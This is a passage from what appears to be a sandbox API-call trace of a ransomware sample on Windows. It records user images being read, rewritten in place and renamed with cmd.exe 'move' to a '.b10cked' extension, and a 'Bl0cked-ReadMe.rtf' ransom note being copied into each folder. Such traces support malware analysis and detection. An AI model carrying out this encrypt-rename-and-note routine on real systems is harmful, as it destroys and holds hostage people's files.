hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.787] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.787] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6240, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6240, lpOverlapped=0x0) returned 1 [0138.787] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.787] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6240, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6240, lpOverlapped=0x0) returned 1 [0138.787] SetFilePointer (in: hFile=0x114, lDistanceToMove=-25152, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6243 [0138.787] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6240, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6240, lpOverlapped=0x0) returned 1 [0138.787] SetFilePointer (in: hFile=0x114, lDistanceToMove=-25152, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6243 [0138.787] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6240, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6240, lpOverlapped=0x0) returned 1 [0138.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4_Irbu3SMZgt2KGk_cO7.jpg", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0138.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4_Irbu3SMZgt2KGk_cO7.jpg", cchWideChar=24, lpMultiByteStr=0x132f63c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4_Irbu3SMZgt2KGk_cO7.jpg", lpUsedDefaultChar=0x0) returned 24 [0138.791] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xc483 [0138.792] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, 
nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.792] CloseHandle (hObject=0x114) returned 1 [0138.809] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG") returned 0x39 [0138.810] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\") returned 0x2d [0138.810] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xea0, dwThreadId=0xe9c)) returned 1 [0138.837] CloseHandle (hObject=0x110) returned 1 [0138.837] CloseHandle (hObject=0x114) returned 1 [0138.837] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", 
cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0138.837] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0138.837] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount1=45, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount2=41) returned 1 [0138.837] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0138.837] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.837] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount1=45, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.837] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.838] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.838] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.838] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\") returned 0x2d [0138.838] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 
0x42 [0138.838] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.838] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xfb4, dwThreadId=0xfac)) returned 1 [0138.859] CloseHandle (hObject=0x110) returned 1 [0138.859] CloseHandle (hObject=0x114) returned 1 [0138.859] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\bl0cked-readme.rtf")) returned 0x20 [0138.859] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.859] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.859] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.859] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.859] ReleaseMutex (hMutex=0xf8) returned 1 [0138.859] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0138.859] ReleaseMutex (hMutex=0xf8) returned 1 [0138.859] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.859] ReleaseMutex (hMutex=0xf8) returned 1 [0138.859] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.859] ReleaseMutex (hMutex=0xf8) returned 1 [0138.860] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19564903975) returned 1 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x18a47 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1855f [0138.861] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x18a47 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x18a47 [0138.863] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.863] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.863] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xc522, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xc522, 
lpOverlapped=0x0) returned 1 [0138.863] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.863] WriteFile (in: hFile=0x114, lpBuffer=0x12596a8*, nNumberOfBytesToWrite=0xc522, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12596a8*, lpNumberOfBytesWritten=0x12ec1c*=0xc522, lpOverlapped=0x0) returned 1 [0138.863] SetFilePointer (in: hFile=0x114, lDistanceToMove=-50466, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc525 [0138.863] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xc522, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xc522, lpOverlapped=0x0) returned 1 [0138.864] SetFilePointer (in: hFile=0x114, lDistanceToMove=-50466, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc525 [0138.864] WriteFile (in: hFile=0x114, lpBuffer=0x12596a8*, nNumberOfBytesToWrite=0xc522, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12596a8*, lpNumberOfBytesWritten=0x12ec1c*=0xc522, lpOverlapped=0x0) returned 1 [0138.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="m41m.jpg", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0138.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="m41m.jpg", cchWideChar=8, lpMultiByteStr=0x131324c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m41m.jpg", lpUsedDefaultChar=0x0) returned 8 [0138.869] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x18a47 [0138.869] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, 
nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.869] CloseHandle (hObject=0x114) returned 1 [0138.870] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg") returned 0x21 [0138.870] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0138.870] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg\" \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg\" \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xf28, dwThreadId=0xf2c)) returned 1 [0138.963] CloseHandle (hObject=0x110) returned 1 [0138.963] CloseHandle (hObject=0x114) returned 1 [0138.963] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.963] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0138.963] 
CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount2=45) returned 1 [0138.963] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.963] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.963] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0138.963] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.963] ReleaseMutex (hMutex=0xf8) returned 1 [0138.963] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.963] ReleaseMutex (hMutex=0xf8) returned 1 [0138.963] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.963] ReleaseMutex (hMutex=0xf8) returned 1 [0138.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.964] ReleaseMutex (hMutex=0xf8) returned 1 [0138.964] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1pzcszwjfy.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
